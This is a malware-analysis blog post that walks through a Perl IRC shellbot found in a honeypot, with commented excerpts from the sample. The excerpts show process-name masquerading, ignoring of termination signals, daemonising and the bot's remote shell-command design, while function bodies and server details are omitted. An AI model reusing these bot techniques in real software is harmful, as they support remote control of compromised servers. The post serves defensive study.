High Level Overview of a Malicious Perl Bot

This blog post was authored by Veronica Valeros and Israel Leiva.


In this blog post we do a quick, high-level analysis of a piece of Perl malware dropped in one of our honeypots. We briefly discuss its main functions and what it is supposed to do. The goal was to learn more about Perl while understanding what the malware is expected to do.

Here we go.

A malicious Perl bot

A new malicious file [1] was downloaded last week to one of our honeypots. It stood out because it was unlike the files typically downloaded there, such as Mirai and Hide n' Seek. The malicious file is a Perl script which, interestingly, contains strings in Portuguese. The file is identified by the following hashes:

SHA256: 4188692fd507fe4c362ad5aa99b5db01673e88ec8bfe605986ceb1480c2e6c97
MD5: 35a12b75a54af8058f8dadfbfd19a4e5

The first submission to VirusTotal was made on May 11, 2018. The AV coverage (35/61) showed that AV vendors identified this generally as a Perl Shellbot. 


Symantec was the only AV to give it a specific name, Santy, which led us to find more concrete information about this threat.

According to a report from Symantec [2], this family was first identified back in 2004 (14 years ago!). It is a worm that attacks vulnerable web servers. While the code of this malware seems similar, there are many variations of the original code out there, which makes it more difficult to tell if this is the same family of malware or not.

Understanding the code

After a quick first look at the code we can see we have three main things: initialisation of variables, declaration of functions, and what looks like the main code.


In Perl, the symbol in front of a variable name (the sigil) indicates its type:

  • The '@' symbol is used to declare arrays
  • The '%' symbol is used to declare hashes (dictionaries with a key:value format)
  • The '$' symbol is used to declare scalar variables

In Perl you can restrict the scope of the variables you declare. If nothing is specified, a variable is assumed to be a package (global) variable. To restrict the scope of a variable, the keyword 'my' should be used before the variable declaration.
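To make the sigils and the effect of 'my' concrete, here is a minimal sketch. All variable names and values are hypothetical and chosen only for illustration; none of them come from the sample.

```perl
use strict;
use warnings;

# Hypothetical names and values, used only for illustration.
my @channels = ("#a", "#b");               # array: ordered list of values
my %ports    = (irc => 6667, web => 80);   # hash: key => value pairs
my $count    = scalar @channels;           # scalar: a single value (the array length)

# The sigil follows the value being accessed: one element is a scalar.
my $first = $channels[0];
my $web   = $ports{web};

our $shared = "package";     # package (global) variable, also reachable as $main::shared
{
    my $shared = "lexical";  # 'my' creates a separate variable limited to this block
    print "inside block: $shared\n";
}
print "outside block: $shared\n";
print "$count channels, first is $first, web port is $web\n";
```

Inside the block the lexical copy hides the package variable; once the block ends, the name refers to the package variable again.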

# Considering the syntax used by Perl, the first variable declaration 
# in the code (line 1.) raises some concern. It is trying to declare 
# what appears to be an array but using a scalar type of variable. 
# This wouldn't break the execution of the code, but it will cause the
# last value of the array ("ps") to be the only valid value of the variable $processo.
1. my $processo =("top","htop","ps");

# Line 2. defines an array with common Web application resources and
# parameters. 
2. my @titi = ("index.php?page=","main.php?page=");

# Line 3. defines a variable which will contain one of the web
# resources stored in the previous variable chosen randomly from 
# the array.
3. my $goni = $titi[rand scalar @titi];

# Line 4. defines a 'maximum number of lines' variable of value 3.
4. my $linas_max='3';

# Line 5. sets a variable 'sleep' with a value of 7.
5. my $sleep='7';

# Line 6. defines an array 'adms' with some key letters 'qwerty' +
# 'xyz'.
6. my @adms=("x", "y", "z", "w", "q", "e", "r", "t", "y");

# Line 7. declares a new array called 'hostauth', probably short for
# 'host authentication', with a single value 'local'
7. my @hostauth=("local");

# Line 8. declares an array named 'canais' which translates from
# Portuguese to 'channels'. 
# The variable is initialized with a single value '#tn'
8. my @canais=("#tn");

# Line 9. runs the uname command and stores its output in 'nick'.
# The 'chop' function "removes the last character of a string and
# returns that character". It modifies the variable in place, so here
# it strips the trailing newline from the uname output and the returned
# character is discarded. The nick is therefore the kernel name of the
# host on which the script is running (e.g. 'Linux').
9. chop (my $nick = `uname`);

# Line 10. sets a variable that translates to 'server' with a default
# IP address value (left empty in this listing).
10. my $servidor="";

# Lines 11-13 define parameters related to IRC: name, real name, 
# and port.
11. my $ircname =("g");
12. my $realname = ("g");
13. my @ircport = ("80","80");

# Line 14 stores in a variable 'porta', which translates to 'port'
# (literally 'door'), a random port number from the ones defined in
# line 13 (not much real choice there).
14. my $porta = $ircport[rand scalar @ircport];

# Line 15. defines a variable which seems to be storing the version of
# the script: 0.5.
15. my $VERSAO = '0.5';
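Three idioms from the declarations above (lines 1, 3 and 9) are easy to misread, so here is a small sketch of how Perl evaluates them. The array name @processos is our own addition for comparison, and a fixed string stands in for the output of uname; both are assumptions for illustration.

```perl
use strict;
# 'use warnings' is left out on purpose: it would flag the discarded
# constants in the scalar assignment below.

# Scalar assignment: the right-hand side is evaluated with the comma
# operator, which discards "top" and "htop" and yields the last value.
my $processo = ("top", "htop", "ps");

# List assignment to an array (hypothetical name) keeps all three values.
my @processos = ("top", "htop", "ps");

# rand(N) returns a fractional number in [0, N); an array index is
# truncated to an integer, so this picks one element at random.
my @titi = ("index.php?page=", "main.php?page=");
my $goni = $titi[rand scalar @titi];

# chop edits its argument in place and removes the final character.
# The fixed string below stands in for the output of `uname`.
chop(my $nick = "Linux\n");

print "processo=$processo, elements=", scalar(@processos), "\n";
print "nick=$nick\n";
```

This prints processo=ps, elements=3 and nick=Linux, which matches the reading that only "ps" survives in $processo and that the nick is the uname output without its newline.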

# Lines 16-20 make the script ignore several signals it may receive.
# INT is the terminal interrupt (e.g. the CTRL+C key sequence);
# HUP is for hang up, "The HUP signal is sent to a process when its
# controlling terminal is closed" [4]; TERM is a termination signal;
# CHLD indicates that a child process has ended or changed state.
# PS does not map to any known signal, as far as we know.
16. $SIG{'INT'} = 'IGNORE';
17. $SIG{'HUP'} = 'IGNORE';
18. $SIG{'TERM'} = 'IGNORE';
19. $SIG{'CHLD'} = 'IGNORE';
20. $SIG{'PS'} = 'IGNORE';
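One way to check which of these names are real signals is to ask Perl itself. The sketch below uses the standard Config module to list the signal names known to the local Perl build, and then shows that an ignored HUP does not stop the process. It assumes a Unix-like system; the variable names are ours.

```perl
use strict;
use warnings;
use Config;

# Signal names known to this Perl build, e.g. "ZERO HUP INT QUIT ...".
my %known = map { $_ => 1 } split ' ', $Config{sig_name};

for my $name (qw(INT HUP TERM CHLD PS)) {
    printf "%-4s %s\n", $name, $known{$name} ? "known signal" : "not a signal name";
}

# Ignoring a real signal: the process keeps running when it is delivered.
$SIG{HUP} = 'IGNORE';
kill 'HUP', $$;        # send HUP to ourselves
my $survived = 1;      # only reached because HUP was ignored
print "still running after HUP\n";
```

On the systems we are aware of, PS is reported as not being a signal name, so line 20 of the sample has no practical effect.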

Perl has different ways to import modules. One of them is through the function 'use'. According to [5], [use] "Imports some semantics into the current package from the named module, generally by aliasing certain subroutine or variable names into your package."

# Lines 21-22 import libraries used to create and manipulate sockets.
21. use IO::Socket;
22. use Socket;

# Line 23. imports IO::Select, an object-oriented interface to the
# select system call.
23. use IO::Select;

# Line 24. forces the script to change the current directory to '/tmp'.
24. chdir("/tmp");

# Line 25. overwrites the content of variable 'servidor', aka 'server',
# if the value was passed as an argument.
25. $servidor="$ARGV[0]" if $ARGV[0];

# Line 26. seems to concatenate the value on 'processo', "ps", with
# sixteen "\0", which is an ASCII NUL character. It then assigns this
# value to $0 to rename its own process name.
26. $0="$processo"."\0"x16;;

# Lines 27-29 are typically used to daemonize a script. These
# instructions will create a child process and let the parent exit. [6]
27. my $pid=fork;
28. exit if $pid; 
29. die "Problema com o fork: $!" unless defined($pid);
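Two details of lines 26-29 can be checked in isolation: how the process name string is built, and what fork returns in each process. This is a minimal sketch, not the sample's code. It does not assign to $0, and the parent waits for the child instead of exiting so that the result is observable. The exit code 7 is arbitrary.

```perl
use strict;
use warnings;

$| = 1;   # flush output immediately so the child does not inherit buffered text

# 'x' binds tighter than '.', so only "\0" is repeated, not the whole string.
my $name = "ps" . "\0" x 16;
print "length: ", length($name), "\n";   # 2 characters plus 16 NULs

my $pid = fork;
die "fork failed: $!" unless defined $pid;   # undef means no child was created

if ($pid == 0) {
    # Child: fork returned 0. A daemon would carry on working here.
    exit 7;
}

# Parent: fork returned the child's PID. The sample exits at this point;
# this sketch waits instead so the child's exit code can be shown.
waitpid($pid, 0);
my $child_exit = $? >> 8;
print "child exited with code $child_exit\n";
```

Note that the sample tests 'exit if $pid' before checking 'defined($pid)'. This still works because an undefined value is false, so a failed fork falls through to the die statement.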

According to the Perl documentation [7], "our makes a lexical alias to a package (i.e. global) variable of the same name in the current package for use within the current lexical scope".

# Lines 30-31 declare the package (global) hashes %irc_servers and
# %DCC so they can be used by name in the rest of the script.
30. our %irc_servers;
31. our %DCC;

# Lines 32-33 create two IO::Select objects, which are used to check
# which handles are ready for reading.
32. my $dcc_sel = new IO::Select->new();
33. $sel_cliente = IO::Select->new();

63. my $line_temp;
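The difference between 'our' and 'my' is easier to see with a fully qualified name. In this sketch the package name Bot, the hash %private_servers and the stored values are hypothetical; only the name %irc_servers is taken from the sample.

```perl
use strict;
use warnings;

package Bot;   # hypothetical package name

our %irc_servers;       # alias for the package variable %Bot::irc_servers
my  %private_servers;   # lexical variable, has no package-qualified name

$irc_servers{sock1}{nick} = "example";
$private_servers{sock1}   = 1;

package main;

# The 'our' variable is reachable from other packages by its full name.
print "nick: $Bot::irc_servers{sock1}{nick}\n";
my $count = scalar keys %Bot::irc_servers;
print "servers: $count\n";
```

Since the sample never declares a package, its 'our' variables live in the default package main.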

At this point, the types, names and values of the variables give away some information about what this piece of malware is going to do. There's information to connect to IRC servers; there are web resources defined; and the script tries to daemonize itself after execution. Let's go deeper.


As we mentioned previously, there is a considerable number of functions defined in the script. We will briefly describe them here before discussing the main logic of the malware. The last section of this blog will discuss the details of these functions.

# This function sends raw information through a socket
34. sub sendraw {}

# This function establishes a connection to a server using information
# passed as parameters
# E.g.: conectar("$nick", "$servidor", "$porta");
42. sub conectar {}

# This function parses single IRC responses and performs different
# actions according to the messages received, the user who sent them
# and the host used. 
102. sub parse {}

# This function parses different instructions received by the parse()
# function and performs different IRC commands (listed below in lines
# 246-279).
150. sub ircase {}

# This function receives and executes system commands sent by parse()
# and sends the result to a given user, line by line.
216. sub shell {}

# The rest of the declared functions are used to respond/send specific
# IRC commands.
246. sub ctcp {}
250. sub msg {}
254. sub notice {}
258. sub op {} # sends MODE adding operator status
262. sub deop {} # sends MODE removing operator status
266. sub j {} 
267. sub join {} # sends a JOIN instruction to a certain channel
271. sub p {} 
272. sub part {} # sends a PART instruction to remove the user from certain channels
275. sub nick {}
279. sub quit {}


The main logic of the malware is quite simple. Following the methodology of the previous section, we will explain it line by line by commenting the code below.

# The main script is designed to run forever via a simple 
# While True loop
64. while( 1 ) {

# The first section is about getting a working connection to the 
# IRC server.
65.   while (!(keys(%irc_servers))) { conectar([redacted-parameters]); }
66.   delete($irc_servers{''}) if (defined($irc_servers{''}));
67.   my @ready = $sel_cliente->can_read(0);
68.   next unless(@ready);
# For each socket that is ready, the malware reads up to 4096 bytes.
# If zero bytes were read, it removes the socket from the select set,
# closes it, and deletes the server entry.
69.   foreach $fh (@ready) {
70.     $IRC_cur_socket = $fh;
71.     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
72.     $nread = sysread($fh, $msg, 4096);
73.     if ($nread == 0) {
74.        $sel_cliente->remove($fh);
75.        $fh->close;
76.        delete($irc_servers{$fh});
77.     }

# The incoming message read from the server is split in lines
# for further processing
78.     @lines = split (/\n/, $msg);

# Each line is sent following different logic to the parse() function
79.     for(my $c=0; $c<= $#lines; $c++) {
97.     }
98.   }
99. }

As we can see from the code above, the malware execution flow is quite simple: 1. create a connection, 2. receive messages, 3. process each message, 4. repeat. The core functions are 'parse()' and 'ircase()', which contain the specific actions for the commands received. The script can handle common IRC commands such as join, msg, and mode changes; it can also send raw messages back to the server, open direct connections to other clients using the CTCP protocol, and execute commands on the infected machine. At first look, the parameters that were set up with the web resources are not used.
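The receive step of this loop (poll with can_read, read with sysread, split into lines) can be reproduced without any network connection. In the sketch below a local pipe stands in for the IRC socket, and the two PING lines are made-up test data; these are assumptions for illustration, not part of the sample.

```perl
use strict;
use warnings;
use IO::Select;
use IO::Handle;

# A local pipe stands in for the IRC socket (assumption for this sketch).
pipe(my $reader, my $writer) or die "pipe failed: $!";
$writer->autoflush(1);

my $sel = IO::Select->new($reader);

# Nothing has been written yet: can_read(0) polls and returns an empty list.
my @idle = $sel->can_read(0);

# Made-up test data in the shape of IRC traffic.
print {$writer} "PING :one\r\nPING :two\r\n";

my @lines;
for my $fh ($sel->can_read(1)) {
    my $nread = sysread($fh, my $msg, 4096);
    if (!$nread) {            # 0 means end of file, undef means error
        $sel->remove($fh);
        close $fh;
        next;
    }
    @lines = split /\r?\n/, $msg;
}
print scalar(@lines), " lines: @lines\n";
```

With a timeout of 0, can_read returns immediately, which is why the sample's outer loop uses 'next unless(@ready)' to keep polling.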

The parse() function

This function is in charge of handling messages received by the bot and performing specific actions. These actions include:

  • Reply to PINGs from the IRC server.
  • React to automatic or manual nick changes and join the set of channels @canais.
  • Handle messages received from any of the @adms connecting from a host in @hostauth. These messages may ask for the execution of commands on the infected server using the shell() function, sending the response back to one of the @adms. It also handles the execution of IRC commands by calling the ircase() function.

The logic and syntax of this function indicate that the code has probably been adapted from an existing bot which had a broader scope.
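For readers unfamiliar with the IRC wire format that such a function has to deal with, here is a generic sketch of splitting one raw line into its parts. It follows the standard message layout (optional ':prefix', a command, then parameters, with the last one optionally introduced by ':'). It is not the sample's parse() code, and the function name parse_irc_line and the example message are our own.

```perl
use strict;
use warnings;

# Generic parser for one raw IRC line (hypothetical helper, not from the sample).
sub parse_irc_line {
    my ($line) = @_;
    $line =~ s/\r?\n\z//;    # drop the line terminator
    return unless $line =~ /^(?::(\S+) +)?(\S+)(?: +(.*))?$/;
    my ($prefix, $command, $rest) = ($1, $2, defined $3 ? $3 : '');

    # A parameter introduced by ':' runs to the end of the line and may contain spaces.
    my $trailing = $rest =~ s/(?:^| +):(.*)$// ? $1 : undef;
    my @params = split ' ', $rest;
    push @params, $trailing if defined $trailing;

    # The prefix of a user message has the form nick!user@host.
    my ($nick) = defined $prefix ? $prefix =~ /^([^!]+)/ : ();

    return { prefix => $prefix, nick => $nick, command => uc $command, params => \@params };
}

my $msg = parse_irc_line(':x!u@local PRIVMSG #tn :hello there' . "\r\n");
print "$msg->{nick} sent $msg->{command} to $msg->{params}[0]: $msg->{params}[1]\n";
```

A parser of this shape is enough to tell a server PING apart from a channel message, and to recover the sender's nick and host for checks like the @adms and @hostauth comparison described above.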


Our analysis indicates that this bot is an adaptation of other malware. Being written in Perl and not obfuscated, this type of malware is easy to copy, adapt, and re-deploy. At the bottom of this blog post there is a list of malware samples closely related to the version analyzed here; they show small changes but are clearly related, as they connect to the same IRC channel. While it is not the typical malware, we observe this type of sample quite frequently in our SSH/Telnet honeypots.


[1] https://www.virustotal.com/en/file/4188692fd507fe4c362ad5aa99b5db01673e88ec8bfe605986ceb1480c2e6c97/analysis/
[2] https://www.symantec.com/security-center/writeup/2004-122109-4444-99
[3] https://en.wikipedia.org/wiki/Santy
[4] https://www.computerhope.com/unix/signals.htm
[5] https://perldoc.perl.org/functions/use.html
[6] http://mkweb.bcgsc.ca/intranet/perlbook/cookbook/ch17_16.htm
[7] https://perldoc.perl.org/functions/our.html

Related Malware Samples

We identified that the following malware samples are variations of the same type of Perl Shellbot.